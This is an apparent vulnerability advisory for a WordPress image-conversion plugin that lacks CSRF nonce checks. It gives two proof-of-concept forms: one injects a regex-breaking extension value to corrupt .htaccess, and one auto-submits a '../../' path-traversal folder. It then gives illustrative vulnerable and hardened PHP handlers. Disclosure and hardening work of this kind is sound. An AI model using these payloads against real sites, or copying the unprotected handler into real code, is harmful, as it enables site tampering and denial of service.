The plugin performs several administrative actions without a CSRF (nonce) check. An attacker who gets a logged-in user to submit a crafted form can therefore modify the plugin's settings, cause a Denial-of-Service (by writing a malformed .htaccess file), and trigger image conversion of arbitrary folders.
The PoC varies with the endpoint targeted. The first example below modifies the website's .htaccess file when the form is submitted by a logged-in user.
<form action="https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=general" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="plugin_sent" value="1">
<input type="hidden" name="webp_quality" value="50">
<input type="hidden" name="upload_convert" value="1">
<input type="hidden" name="method" value="gd">
<input type="hidden" name="extensions[]" value="jpg">
<!-- This value is interpolated into the regular expression the plugin writes to .htaccess. An invalid regular expression instead produces a malformed .htaccess file and a DoS. -->
<input type="hidden" name="extensions[]" value="INJECT_VALUE_HERE)|(.*">
<input type="submit">
</form>
The second example triggers conversion of the files in C:\xampp\htdocs\png_images when WordPress is installed at C:\xampp\htdocs\wordpress\: the folder parameter is resolved relative to wp-content and is not confined to the uploads directory, so "../../png_images" escapes the WordPress install. The form submits itself as soon as the page loads.
<form action="https://example.com/wp-admin/admin-ajax.php" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="action" value="convert_old_images">
<input type="hidden" name="only_missing" value="0">
<input type="hidden" name="folder" value="../../png_images">
</form>
<script>form.submit()</script>
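Added example, not the plugin's own code: a hypothetical settings handler and a hypothetical handler for the convert_old_images AJAX action, each shown in the unprotected form that both PoCs above rely on and then in a hardened form. The itw_* function names, the nonce action names and the shape of the .htaccess rule are assumptions for illustration; only the WordPress API calls (check_admin_referer, check_ajax_referer, current_user_can, wp_nonce_field, wp_upload_dir, wp_send_json_error) are real.

```php
<?php
// Illustrative code, not taken from the images-to-webp plugin.
// All itw_* names and the .htaccess rule layout are assumptions.

// --- Unprotected pattern (what the PoCs exploit) ---
function itw_vuln_save_settings() {
    if ( empty( $_POST['plugin_sent'] ) ) { return; }
    // No nonce and no capability check: any request carrying the expected
    // field names is processed, including one posted by a cross-site form.
    $extensions = (array) $_POST['extensions'];
    file_put_contents( ABSPATH . '.htaccess', itw_build_htaccess( $extensions ) );
}

function itw_build_htaccess( array $extensions ) {
    // Extensions are interpolated unescaped into a regex: a value such as
    // "INJECT_VALUE_HERE)|(.*" rewrites the match, an unbalanced one breaks
    // the file and Apache answers every request with a 500.
    $alternation = implode( '|', $extensions );
    return "RewriteCond %{REQUEST_FILENAME} \\.({$alternation})\$\n";
}

// --- Hardened settings handler ---
function itw_safe_save_settings() {
    if ( empty( $_POST['plugin_sent'] ) ) { return; }
    // 1. Nonce: a form rendered by another origin cannot carry a valid one.
    check_admin_referer( 'itw_save_settings', 'itw_nonce' );
    // 2. Capability: only users allowed to manage options may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // 3. Allow-list each extension so nothing regex-significant reaches .htaccess.
    $extensions = array();
    foreach ( (array) ( $_POST['extensions'] ?? array() ) as $ext ) {
        $ext = strtolower( sanitize_text_field( wp_unslash( $ext ) ) );
        if ( preg_match( '/^[a-z0-9]{1,5}$/', $ext ) ) {
            $extensions[] = $ext;
        }
    }
    if ( empty( $extensions ) ) {
        wp_die( 'No valid extensions supplied', '', array( 'response' => 400 ) );
    }
    file_put_contents( ABSPATH . '.htaccess', itw_build_htaccess( $extensions ) );
}

// The settings page must emit the nonce that check_admin_referer() verifies.
function itw_settings_form() {
    echo '<form method="post">';
    wp_nonce_field( 'itw_save_settings', 'itw_nonce' );
    echo '<input type="hidden" name="plugin_sent" value="1">';
    echo '<input type="text" name="extensions[]" value="jpg">';
    echo '<input type="submit"></form>';
}

// --- Hardened AJAX conversion handler ---
// Registered only for authenticated users (no wp_ajax_nopriv_ variant).
add_action( 'wp_ajax_convert_old_images', 'itw_safe_convert_old_images' );

function itw_safe_convert_old_images() {
    // Same two checks as above; check_ajax_referer() dies on failure by default.
    check_ajax_referer( 'itw_convert', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Confine "folder" to the uploads directory: resolve it and require the
    // resolved path to sit under the resolved base, which defeats "../../".
    $base   = realpath( wp_upload_dir()['basedir'] );
    $folder = realpath( $base . '/' . sanitize_text_field( wp_unslash( $_POST['folder'] ?? '' ) ) );
    if ( false === $base || false === $folder
         || 0 !== strpos( $folder . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'folder outside uploads directory', 400 );
    }
    $only_missing = ! empty( $_POST['only_missing'] );
    // ... convert the images found in $folder (respecting $only_missing) ...
    wp_send_json_success( array( 'folder' => $folder ) );
}
```

With the nonce in place the attacker's form fails check_admin_referer() before any setting is written, and the path check turns the "../../png_images" request into a 400 instead of a conversion run outside wp-content/uploads. The nonce is the CSRF fix; the capability and input checks close the separate authorization and injection weaknesses the PoCs also exercise.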